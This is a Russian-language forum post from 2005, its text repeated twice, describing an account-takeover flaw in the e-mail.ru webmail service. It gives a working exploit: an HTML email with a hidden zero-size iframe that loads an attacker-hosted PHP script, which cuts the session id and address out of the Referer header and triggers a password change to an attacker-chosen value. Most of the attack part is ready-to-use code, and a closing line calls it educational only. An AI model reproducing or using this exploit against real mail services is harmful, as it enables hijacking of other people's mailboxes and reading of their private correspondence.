Майор
20.03.2005, 15:37
В продолжении обзора багов во второстепенных почтовых серверах рунета...:
Сервер не использует cookie, идентификация пользователя осуществляется только по id.
Собственно сам баг заключается в том, что пароль к ящику можно изменить, не зная старого пароля.
Сервер не фильтрует тег iframe, что позволяет нам встроить в страницу свой скрипт на php, на который передаётся referer, из которого мы и вырежем идентификатор сессии.
Посылаем жертве письмо в html формате вида :
<iframe src="http://adres_skripta/skript.php" height=0 width=0 scrolling=no frameborder=no></iframe>
Используем передачу данных с помощью метода GET.
skript:
<?
$nachalo=strpos("$HTTP_REFERER","@e-mail.ru_")+11; // ищем номер позиции, с которой начинается id
$konec=strpos("$HTTP_REFERER","&fld="); // ищем номер позиции, на которой заканчивается id
$dlina=$konec-$nachalo; // получаем длину id
$id=substr("$HTTP_REFERER","$nachalo","$dlina"); // вырезаем id из referer
// Для того чтоб не изменять каждый раз скрипт мы будем вырезать ещё и адрес мыла
$nachalo2=strpos("$HTTP_REFERER","utoken=")+7;
$konec2=$nachalo-11;
$dlina2=$konec2-$nachalo2;
$milo=substr("$HTTP_REFERER","$nachalo2","$dlina2");
echo "<html>
<iframe src=http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd1&utoken={$milo}@e-mail.ru_{$id}&show=passwd.tpl&pass=PAROL&repass=PAROL></iframe>
</html>";
// PAROL - это пароль каторый надо установить
?>
Таким образом, уязвимость браузеронезависима
P.S. Изменяя таким образом пароль, у ящика становится 2 пароля (старый действителен до тех пор, пока не будет введён новый)
P.SS ДАННАЯ ИНФОРМАЦИЯ НОСИТ ЧИСТО ПОЗНОВАТЕЛЬНЫЙ ХАРАКТЕР. НЕ ПРИМЕНЯЙТЕ ЕЁ.
Автор: Mayor
Сервер не использует cookie, идентификация пользователя осуществляется только по id.
Собственно сам баг заключается в том, что пароль к ящику можно изменить, не зная старого пароля.
Сервер не фильтрует тег iframe, что позволяет нам встроить в страницу свой скрипт на php, на который передаётся referer, из которого мы и вырежем идентификатор сессии.
Посылаем жертве письмо в html формате вида :
<iframe src="http://adres_skripta/skript.php" height=0 width=0 scrolling=no frameborder=no></iframe>
Используем передачу данных с помощью метода GET.
skript:
<?
$nachalo=strpos("$HTTP_REFERER","@e-mail.ru_")+11; // ищем номер позиции, с которой начинается id
$konec=strpos("$HTTP_REFERER","&fld="); // ищем номер позиции, на которой заканчивается id
$dlina=$konec-$nachalo; // получаем длину id
$id=substr("$HTTP_REFERER","$nachalo","$dlina"); // вырезаем id из referer
// Для того чтоб не изменять каждый раз скрипт мы будем вырезать ещё и адрес мыла
$nachalo2=strpos("$HTTP_REFERER","utoken=")+7;
$konec2=$nachalo-11;
$dlina2=$konec2-$nachalo2;
$milo=substr("$HTTP_REFERER","$nachalo2","$dlina2");
echo "<html>
<iframe src=http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd1&utoken={$milo}@e-mail.ru_{$id}&show=passwd.tpl&pass=PAROL&repass=PAROL></iframe>
</html>";
// PAROL - это пароль каторый надо установить
?>
Таким образом, уязвимость браузеронезависима
P.S. Изменяя таким образом пароль, у ящика становится 2 пароля (старый действителен до тех пор, пока не будет введён новый)
P.SS ДАННАЯ ИНФОРМАЦИЯ НОСИТ ЧИСТО ПОЗНОВАТЕЛЬНЫЙ ХАРАКТЕР. НЕ ПРИМЕНЯЙТЕ ЕЁ.
Автор: Mayor